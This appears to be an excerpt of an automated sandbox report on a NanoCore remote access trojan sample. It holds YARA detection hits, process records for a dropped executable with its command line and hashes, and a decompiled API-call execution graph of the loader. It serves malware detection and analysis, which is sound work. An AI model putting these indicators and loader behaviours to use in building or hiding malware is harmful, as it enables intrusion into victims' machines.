                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.508294915.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.508294915.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.508782806.00000000067F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.508782806.00000000067F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.508782806.00000000067F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.508782806.00000000067F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.508849965.0000000006810000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.508849965.0000000006810000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.508849965.0000000006810000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.508849965.0000000006810000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.508596907.0000000006640000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.508596907.0000000006640000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.508596907.0000000006640000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.508596907.0000000006640000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.509045139.0000000006870000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.509045139.0000000006870000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.509045139.0000000006870000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.509045139.0000000006870000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.503941570.0000000003575000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.509221233.00000000068B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.509221233.00000000068B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.509221233.00000000068B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.509221233.00000000068B0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.508927189.0000000006840000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.508927189.0000000006840000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.508927189.0000000006840000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.508927189.0000000006840000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.503941570.0000000003851000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.503941570.0000000003851000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.502791120.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.502791120.0000000002551000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                    • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Reputation:low

                    Target ID:3
                    Start time:05:14:21
                    Start date:01/02/2023
                    Path:C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exe" "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\
                    Imagebase:0x400000
                    File size:76800 bytes
                    MD5 hash:C1DC97853E14C21B463C6E95B21C300C
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Antivirus matches:
                    • Detection: 10%, ReversingLabs
                    Reputation:low

                    Target ID:6
                    Start time:05:14:24
                    Start date:01/02/2023
                    Path:C:\Windows\SysWOW64\WerFault.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 656
                    Imagebase:0xe50000
                    File size:434592 bytes
                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:7
                    Start time:05:14:30
                    Start date:01/02/2023
                    Path:C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\ilkqegcy\jfcarlsrvb.exe" "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\
                    Imagebase:0x400000
                    File size:76800 bytes
                    MD5 hash:C1DC97853E14C21B463C6E95B21C300C
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Target ID:9
                    Start time:05:14:31
                    Start date:01/02/2023
                    Path:C:\Windows\SysWOW64\WerFault.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5880 -s 628
                    Imagebase:0xe50000
                    File size:434592 bytes
                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Reset < >

                      Execution Graph

                      Execution Coverage:15.9%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:16.5%
                      Total number of Nodes:1379
                      Total number of Limit Nodes:25
                      execution_graph 3219 403640 SetErrorMode GetVersionExW 3220 403692 GetVersionExW 3219->3220 3221 4036ca 3219->3221 3220->3221 3222 403723 3221->3222 3223 406a35 5 API calls 3221->3223 3309 4069c5 GetSystemDirectoryW 3222->3309 3223->3222 3225 403739 lstrlenA 3225->3222 3226 403749 3225->3226 3312 406a35 GetModuleHandleA 3226->3312 3229 406a35 5 API calls 3230 403757 3229->3230 3231 406a35 5 API calls 3230->3231 3232 403763 #17 OleInitialize SHGetFileInfoW 3231->3232 3318 406668 lstrcpynW 3232->3318 3235 4037b0 GetCommandLineW 3319 406668 lstrcpynW 3235->3319 3237 4037c2 3320 405f64 3237->3320 3240 4038f7 3241 40390b GetTempPathW 3240->3241 3324 40360f 3241->3324 3243 403923 3245 403927 GetWindowsDirectoryW lstrcatW 3243->3245 3246 40397d DeleteFileW 3243->3246 3244 405f64 CharNextW 3248 4037f9 3244->3248 3249 40360f 12 API calls 3245->3249 3334 4030d0 GetTickCount GetModuleFileNameW 3246->3334 3248->3240 3248->3244 3253 4038f9 3248->3253 3251 403943 3249->3251 3250 403990 3254 403b6c ExitProcess OleUninitialize 3250->3254 3256 403a45 3250->3256 3263 405f64 CharNextW 3250->3263 3251->3246 3252 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3251->3252 3255 40360f 12 API calls 3252->3255 3420 406668 lstrcpynW 3253->3420 3258 403b91 3254->3258 3259 403b7c 3254->3259 3262 403975 3255->3262 3364 403d17 3256->3364 3260 403b99 GetCurrentProcess OpenProcessToken 3258->3260 3261 403c0f ExitProcess 3258->3261 3474 405cc8 3259->3474 3266 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3260->3266 3267 403bdf 3260->3267 3262->3246 3262->3254 3278 4039b2 3263->3278 3266->3267 3271 406a35 5 API calls 3267->3271 3268 403a54 3268->3254 3274 403be6 3271->3274 3272 403a1b 3421 40603f 3272->3421 3273 403a5c 3437 405c33 3273->3437 3276 403bfb ExitWindowsEx 3274->3276 3280 403c08 3274->3280 3276->3261 3276->3280 3278->3272 3278->3273 3478 40140b 3280->3478 3283 403a72 lstrcatW 3284 403a7d lstrcatW lstrcmpiW 3283->3284 3284->3268 3285 403a9d 3284->3285 3287 403aa2 3285->3287 3288 403aa9 3285->3288 3440 405b99 CreateDirectoryW 3287->3440 3445 405c16 CreateDirectoryW 3288->3445 3289 403a3a 3436 406668 lstrcpynW 3289->3436 3294 403aae SetCurrentDirectoryW 3295 403ac0 3294->3295 3296 403acb 3294->3296 3448 406668 lstrcpynW 3295->3448 3449 406668 lstrcpynW 3296->3449 3301 403b19 CopyFileW 3305 403ad8 3301->3305 3302 403b63 3304 406428 36 API calls 3302->3304 3304->3268 3305->3302 3306 4066a5 17 API calls 3305->3306 3308 403b4d CloseHandle 3305->3308 3450 4066a5 3305->3450 3467 406428 MoveFileExW 3305->3467 3471 405c4b CreateProcessW 3305->3471 3306->3305 3308->3305 3311 4069e7 wsprintfW LoadLibraryExW 3309->3311 3311->3225 3313 406a51 3312->3313 3314 406a5b GetProcAddress 3312->3314 3315 4069c5 3 API calls 3313->3315 3316 403750 3314->3316 3317 406a57 3315->3317 3316->3229 3317->3314 3317->3316 3318->3235 3319->3237 3321 405f6a 3320->3321 3322 4037e8 CharNextW 3321->3322 3323 405f71 CharNextW 3321->3323 3322->3248 3323->3321 3481 4068ef 3324->3481 3326 403625 3326->3243 3327 40361b 3327->3326 3490 405f37 lstrlenW CharPrevW 3327->3490 3330 405c16 2 API calls 3331 403633 3330->3331 3493 406187 3331->3493 3497 406158 GetFileAttributesW CreateFileW 3334->3497 3336 403113 3363 403120 3336->3363 3498 406668 lstrcpynW 3336->3498 3338 403136 3499 405f83 lstrlenW 3338->3499 3342 403147 GetFileSize 3343 403241 3342->3343 3362 40315e 3342->3362 3504 40302e 3343->3504 3347 403286 GlobalAlloc 3350 40329d 3347->3350 3349 4032de 3352 40302e 32 API calls 3349->3352 3354 406187 2 API calls 3350->3354 3351 403267 3353 4035e2 ReadFile 3351->3353 3352->3363 3355 403272 3353->3355 3357 4032ae CreateFileW 3354->3357 3355->3347 3355->3363 3356 40302e 32 API calls 3356->3362 3358 4032e8 3357->3358 3357->3363 3519 4035f8 SetFilePointer 3358->3519 3360 4032f6 3520 403371 3360->3520 3362->3343 3362->3349 3362->3356 3362->3363 3535 4035e2 3362->3535 3363->3250 3365 406a35 5 API calls 3364->3365 3366 403d2b 3365->3366 3367 403d31 3366->3367 3368 403d43 3366->3368 3590 4065af wsprintfW 3367->3590 3591 406536 3368->3591 3371 403d92 lstrcatW 3374 403d41 3371->3374 3373 406536 3 API calls 3373->3371 3582 403fed 3374->3582 3377 40603f 18 API calls 3378 403dc4 3377->3378 3379 403e58 3378->3379 3381 406536 3 API calls 3378->3381 3380 40603f 18 API calls 3379->3380 3382 403e5e 3380->3382 3383 403df6 3381->3383 3384 403e6e LoadImageW 3382->3384 3387 4066a5 17 API calls 3382->3387 3383->3379 3390 403e17 lstrlenW 3383->3390 3394 405f64 CharNextW 3383->3394 3385 403f14 3384->3385 3386 403e95 RegisterClassW 3384->3386 3389 40140b 2 API calls 3385->3389 3388 403ecb SystemParametersInfoW CreateWindowExW 3386->3388 3419 403f1e 3386->3419 3387->3384 3388->3385 3393 403f1a 3389->3393 3391 403e25 lstrcmpiW 3390->3391 3392 403e4b 3390->3392 3391->3392 3395 403e35 GetFileAttributesW 3391->3395 3396 405f37 3 API calls 3392->3396 3399 403fed 18 API calls 3393->3399 3393->3419 3397 403e14 3394->3397 3398 403e41 3395->3398 3400 403e51 3396->3400 3397->3390 3398->3392 3401 405f83 2 API calls 3398->3401 3402 403f2b 3399->3402 3596 406668 lstrcpynW 3400->3596 3401->3392 3404 403f37 ShowWindow 3402->3404 3405 403fba 3402->3405 3407 4069c5 3 API calls 3404->3407 3597 40579d OleInitialize 3405->3597 3409 403f4f 3407->3409 3408 403fc0 3410 403fc4 3408->3410 3411 403fdc 3408->3411 3412 403f5d GetClassInfoW 3409->3412 3414 4069c5 3 API calls 3409->3414 3418 40140b 2 API calls 3410->3418 3410->3419 3413 40140b 2 API calls 3411->3413 3415 403f71 GetClassInfoW RegisterClassW 3412->3415 3416 403f87 DialogBoxParamW 3412->3416 3413->3419 3414->3412 3415->3416 3417 40140b 2 API calls 3416->3417 3417->3419 3418->3419 3419->3268 3420->3241 3619 406668 lstrcpynW 3421->3619 3423 406050 3620 405fe2 CharNextW CharNextW 3423->3620 3426 403a27 3426->3254 3435 406668 lstrcpynW 3426->3435 3427 4068ef 5 API calls 3433 406066 3427->3433 3428 406097 lstrlenW 3429 4060a2 3428->3429 3428->3433 3430 405f37 3 API calls 3429->3430 3432 4060a7 GetFileAttributesW 3430->3432 3432->3426 3433->3426 3433->3428 3434 405f83 2 API calls 3433->3434 3626 40699e FindFirstFileW 3433->3626 3434->3428 3435->3289 3436->3256 3438 406a35 5 API calls 3437->3438 3439 403a61 lstrcatW 3438->3439 3439->3283 3439->3284 3441 405bea GetLastError 3440->3441 3442 403aa7 3440->3442 3441->3442 3443 405bf9 SetFileSecurityW 3441->3443 3442->3294 3443->3442 3444 405c0f GetLastError 3443->3444 3444->3442 3446 405c26 3445->3446 3447 405c2a GetLastError 3445->3447 3446->3294 3447->3446 3448->3296 3449->3305 3454 4066b2 3450->3454 3451 4068d5 3452 403b0d DeleteFileW 3451->3452 3631 406668 lstrcpynW 3451->3631 3452->3301 3452->3305 3454->3451 3455 4068a3 lstrlenW 3454->3455 3458 406536 3 API calls 3454->3458 3459 4066a5 10 API calls 3454->3459 3460 4067ba GetSystemDirectoryW 3454->3460 3461 4067cd GetWindowsDirectoryW 3454->3461 3462 4067fc SHGetSpecialFolderLocation 3454->3462 3463 4066a5 10 API calls 3454->3463 3464 406844 lstrcatW 3454->3464 3465 4068ef 5 API calls 3454->3465 3629 4065af wsprintfW 3454->3629 3630 406668 lstrcpynW 3454->3630 3455->3454 3458->3454 3459->3455 3460->3454 3461->3454 3462->3454 3466 406814 SHGetPathFromIDListW CoTaskMemFree 3462->3466 3463->3454 3464->3454 3465->3454 3466->3454 3468 40643c 3467->3468 3470 406449 3467->3470 3632 4062ae 3468->3632 3470->3305 3472 405c8a 3471->3472 3473 405c7e CloseHandle 3471->3473 3472->3305 3473->3472 3475 405cdd 3474->3475 3476 403b89 ExitProcess 3475->3476 3477 405cf1 MessageBoxIndirectW 3475->3477 3477->3476 3479 401389 2 API calls 3478->3479 3480 401420 3479->3480 3480->3261 3487 4068fc 3481->3487 3482 406977 CharPrevW 3483 406972 3482->3483 3483->3482 3485 406998 3483->3485 3484 406965 CharNextW 3484->3483 3484->3487 3485->3327 3486 405f64 CharNextW 3486->3487 3487->3483 3487->3484 3487->3486 3488 406951 CharNextW 3487->3488 3489 406960 CharNextW 3487->3489 3488->3487 3489->3484 3491 405f53 lstrcatW 3490->3491 3492 40362d 3490->3492 3491->3492 3492->3330 3494 406194 GetTickCount GetTempFileNameW 3493->3494 3495 40363e 3494->3495 3496 4061ca 3494->3496 3495->3243 3496->3494 3496->3495 3497->3336 3498->3338 3500 405f91 3499->3500 3501 40313c 3500->3501 3502 405f97 CharPrevW 3500->3502 3503 406668 lstrcpynW 3501->3503 3502->3500 3502->3501 3503->3342 3505 403057 3504->3505 3506 40303f 3504->3506 3509 403067 GetTickCount 3505->3509 3510 40305f 3505->3510 3507 403048 DestroyWindow 3506->3507 3508 40304f 3506->3508 3507->3508 3508->3347 3508->3363 3538 4035f8 SetFilePointer 3508->3538 3509->3508 3511 403075 3509->3511 3539 406a71 3510->3539 3513 4030aa CreateDialogParamW ShowWindow 3511->3513 3514 40307d 3511->3514 3513->3508 3514->3508 3543 403012 3514->3543 3516 40308b wsprintfW 3546 4056ca 3516->3546 3519->3360 3521 403380 SetFilePointer 3520->3521 3522 40339c 3520->3522 3521->3522 3557 403479 GetTickCount 3522->3557 3527 403479 42 API calls 3528 4033d3 3527->3528 3529 40343f ReadFile 3528->3529 3533 4033e2 3528->3533 3534 403439 3528->3534 3529->3534 3531 4061db ReadFile 3531->3533 3533->3531 3533->3534 3572 40620a WriteFile 3533->3572 3534->3363 3536 4061db ReadFile 3535->3536 3537 4035f5 3536->3537 3537->3362 3538->3351 3540 406a8e PeekMessageW 3539->3540 3541 406a84 DispatchMessageW 3540->3541 3542 406a9e 3540->3542 3541->3540 3542->3508 3544 403021 3543->3544 3545 403023 MulDiv 3543->3545 3544->3545 3545->3516 3548 4056e5 3546->3548 3556 4030a8 3546->3556 3547 405701 lstrlenW 3550 40572a 3547->3550 3551 40570f lstrlenW 3547->3551 3548->3547 3549 4066a5 17 API calls 3548->3549 3549->3547 3553 405730 SetWindowTextW 3550->3553 3554 40573d 3550->3554 3552 405721 lstrcatW 3551->3552 3551->3556 3552->3550 3553->3554 3555 405743 SendMessageW SendMessageW SendMessageW 3554->3555 3554->3556 3555->3556 3556->3508 3558 4035d1 3557->3558 3559 4034a7 3557->3559 3560 40302e 32 API calls 3558->3560 3574 4035f8 SetFilePointer 3559->3574 3567 4033a3 3560->3567 3562 4034b2 SetFilePointer 3566 4034d7 3562->3566 3563 4035e2 ReadFile 3563->3566 3565 40302e 32 API calls 3565->3566 3566->3563 3566->3565 3566->3567 3568 40620a WriteFile 3566->3568 3569 4035b2 SetFilePointer 3566->3569 3575 406bb0 3566->3575 3567->3534 3570 4061db ReadFile 3567->3570 3568->3566 3569->3558 3571 4033bc 3570->3571 3571->3527 3571->3534 3573 406228 3572->3573 3573->3533 3574->3562 3576 406bd5 3575->3576 3577 406bdd 3575->3577 3576->3566 3577->3576 3578 406c64 GlobalFree 3577->3578 3579 406c6d GlobalAlloc 3577->3579 3580 406ce4 GlobalAlloc 3577->3580 3581 406cdb GlobalFree 3577->3581 3578->3579 3579->3576 3579->3577 3580->3576 3580->3577 3581->3580 3583 404001 3582->3583 3604 4065af wsprintfW 3583->3604 3585 404072 3605 4040a6 3585->3605 3587 403da2 3587->3377 3588 404077 3588->3587 3589 4066a5 17 API calls 3588->3589 3589->3588 3590->3374 3608 4064d5 3591->3608 3594 403d73 3594->3371 3594->3373 3595 40656a RegQueryValueExW RegCloseKey 3595->3594 3596->3379 3612 404610 3597->3612 3599 4057e7 3600 404610 SendMessageW 3599->3600 3601 4057f9 OleUninitialize 3600->3601 3601->3408 3603 4057c0 3603->3599 3615 401389 3603->3615 3604->3585 3606 4066a5 17 API calls 3605->3606 3607 4040b4 SetWindowTextW 3606->3607 3607->3588 3609 4064e4 3608->3609 3610 4064ed RegOpenKeyExW 3609->3610 3611 4064e8 3609->3611 3610->3611 3611->3594 3611->3595 3613 404628 3612->3613 3614 404619 SendMessageW 3612->3614 3613->3603 3614->3613 3617 401390 3615->3617 3616 4013fe 3616->3603 3617->3616 3618 4013cb MulDiv SendMessageW 3617->3618 3618->3617 3619->3423 3621 405fff 3620->3621 3623 406011 3620->3623 3621->3623 3624 40600c CharNextW 3621->3624 3622 406035 3622->3426 3622->3427 3623->3622 3625 405f64 CharNextW 3623->3625 3624->3622 3625->3623 3627 4069b4 FindClose 3626->3627 3628 4069bf 3626->3628 3627->3628 3628->3433 3629->3454 3630->3454 3631->3452 3633 406304 GetShortPathNameW 3632->3633 3634 4062de 3632->3634 3636 406423 3633->3636 3637 406319 3633->3637 3659 406158 GetFileAttributesW CreateFileW 3634->3659 3636->3470 3637->3636 3639 406321 wsprintfA 3637->3639 3638 4062e8 CloseHandle GetShortPathNameW 3638->3636 3640 4062fc 3638->3640 3641 4066a5 17 API calls 3639->3641 3640->3633 3640->3636 3642 406349 3641->3642 3660 406158 GetFileAttributesW CreateFileW 3642->3660 3644 406356 3644->3636 3645 406365 GetFileSize GlobalAlloc 3644->3645 3646 406387 3645->3646 3647 40641c CloseHandle 3645->3647 3648 4061db ReadFile 3646->3648 3647->3636 3649 40638f 3648->3649 3649->3647 3661 4060bd lstrlenA 3649->3661 3652 4063a6 lstrcpyA 3655 4063c8 3652->3655 3653 4063ba 3654 4060bd 4 API calls 3653->3654 3654->3655 3656 4063ff SetFilePointer 3655->3656 3657 40620a WriteFile 3656->3657 3658 406415 GlobalFree 3657->3658 3658->3647 3659->3638 3660->3644 3662 4060fe lstrlenA 3661->3662 3663 4060d7 lstrcmpiA 3662->3663 3665 406106 3662->3665 3664 4060f5 CharNextA 3663->3664 3663->3665 3664->3662 3665->3652 3665->3653 3666 401941 3667 401943 3666->3667 3672 402da6 3667->3672 3673 402db2 3672->3673 3674 4066a5 17 API calls 3673->3674 3675 402dd3 3674->3675 3676 401948 3675->3676 3677 4068ef 5 API calls 3675->3677 3678 405d74 3676->3678 3677->3676 3679 40603f 18 API calls 3678->3679 3680 405d94 3679->3680 3681 405d9c DeleteFileW 3680->3681 3682 405db3 3680->3682 3686 401951 3681->3686 3683 405ed3 3682->3683 3714 406668 lstrcpynW 3682->3714 3683->3686 3690 40699e 2 API calls 3683->3690 3685 405dd9 3687 405dec 3685->3687 3688 405ddf lstrcatW 3685->3688 3689 405f83 2 API calls 3687->3689 3691 405df2 3688->3691 3689->3691 3693 405ef8 3690->3693 3692 405e02 lstrcatW 3691->3692 3694 405e0d lstrlenW FindFirstFileW 3691->3694 3692->3694 3693->3686 3695 405f37 3 API calls 3693->3695 3694->3683 3712 405e2f 3694->3712 3696 405f02 3695->3696 3698 405d2c 5 API calls 3696->3698 3697 405eb6 FindNextFileW 3701 405ecc FindClose 3697->3701 3697->3712 3700 405f0e 3698->3700 3702 405f12 3700->3702 3703 405f28 3700->3703 3701->3683 3702->3686 3706 4056ca 24 API calls 3702->3706 3705 4056ca 24 API calls 3703->3705 3705->3686 3708 405f1f 3706->3708 3707 405d74 60 API calls 3707->3712 3710 406428 36 API calls 3708->3710 3709 4056ca 24 API calls 3709->3697 3710->3686 3711 4056ca 24 API calls 3711->3712 3712->3697 3712->3707 3712->3709 3712->3711 3713 406428 36 API calls 3712->3713 3715 406668 lstrcpynW 3712->3715 3716 405d2c 3712->3716 3713->3712 3714->3685 3715->3712 3724 406133 GetFileAttributesW 3716->3724 3719 405d59 3719->3712 3720 405d47 RemoveDirectoryW 3722 405d55 3720->3722 3721 405d4f DeleteFileW 3721->3722 3722->3719 3723 405d65 SetFileAttributesW 3722->3723 3723->3719 3725 405d38 3724->3725 3726 406145 SetFileAttributesW 3724->3726 3725->3719 3725->3720 3725->3721 3726->3725 3727 4015c1 3728 402da6 17 API calls 3727->3728 3729 4015c8 3728->3729 3730 405fe2 4 API calls 3729->3730 3740 4015d1 3730->3740 3731 401631 3733 401663 3731->3733 3734 401636 3731->3734 3732 405f64 CharNextW 3732->3740 3736 401423 24 API calls 3733->3736 3746 401423 3734->3746 3744 40165b 3736->3744 3738 405c16 2 API calls 3738->3740 3740->3731 3740->3732 3740->3738 3741 405c33 5 API calls 3740->3741 3743 401617 GetFileAttributesW 3740->3743 3745 405b99 4 API calls 3740->3745 3741->3740 3742 40164a SetCurrentDirectoryW 3742->3744 3743->3740 3745->3740 3747 4056ca 24 API calls 3746->3747 3748 401431 3747->3748 3749 406668 lstrcpynW 3748->3749 3749->3742 3930 401c43 3952 402d84 3930->3952 3932 401c4a 3933 402d84 17 API calls 3932->3933 3934 401c57 3933->3934 3935 402da6 17 API calls 3934->3935 3936 401c6c 3934->3936 3935->3936 3937 401c7c 